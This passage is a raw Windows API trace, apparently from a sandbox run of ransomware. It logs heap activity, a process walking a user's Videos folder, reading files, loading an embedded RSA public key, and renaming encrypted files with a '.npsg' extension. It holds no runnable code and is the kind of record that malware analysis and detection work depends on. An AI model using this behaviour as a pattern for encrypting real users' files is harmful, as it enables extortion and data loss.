dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89150 [0246.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890f0 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890f0 [0246.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890c0 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bc90 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0246.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890f0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890a8 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89048 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fdf0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.116] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x4e03, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x4e03, lpOverlapped=0x0) returned 1 [0246.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.146] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4e08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.146] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.146] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.146] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.146] CloseHandle (hObject=0x644) returned 1 [0246.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0246.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.148] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\TVHBi_paVPI4HWd.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\tvhbi_pavpi4hwd.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\TVHBi_paVPI4HWd.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\tvhbi_pavpi4hwd.mkv.npsg")) returned 1 [0246.150] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8af12b80, ftCreationTime.dwHighDateTime=0x1d5c2e8, ftLastAccessTime.dwLowDateTime=0xfc91e910, ftLastAccessTime.dwHighDateTime=0x1d5c53f, ftLastWriteTime.dwLowDateTime=0xfc91e910, ftLastWriteTime.dwHighDateTime=0x1d5c53f, nFileSizeHigh=0x0, nFileSizeLow=0xfdbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vlTs7fzJcWepTk4r.flv", cAlternateFileName="VLTS7F~1.FLV")) returned 1 [0246.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0246.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.150] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\vlTs7fzJcWepTk4r.flv") returned=".flv" [0246.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\vlTs7fzJcWepTk4r.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\vlts7fzjcweptk4r.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.151] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=64958) returned 1 [0246.151] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.153] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfd98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.153] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.155] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0xfdbe, lpOverlapped=0x0) returned 1 [0246.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.156] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a220) returned 1 [0246.157] CryptCreateHash (in: hProv=0x67a220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.157] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.157] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.157] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.157] GetLastError () returned 0x0 [0246.157] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.157] CryptReleaseContext (hProv=0x67a220, dwFlags=0x0) returned 1 [0246.157] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.157] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.157] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fdf0 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89048 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fe38 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890a8 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890d8 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89138 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890f0 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0246.158] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8ccd0 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8a9d8 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89138 [0246.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890d8 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890f0 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b890c0 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89150 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89120 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89108 [0246.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89168 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89108 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89120 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b890d8 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890d8 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.161] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89108 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890f0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b890c0 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 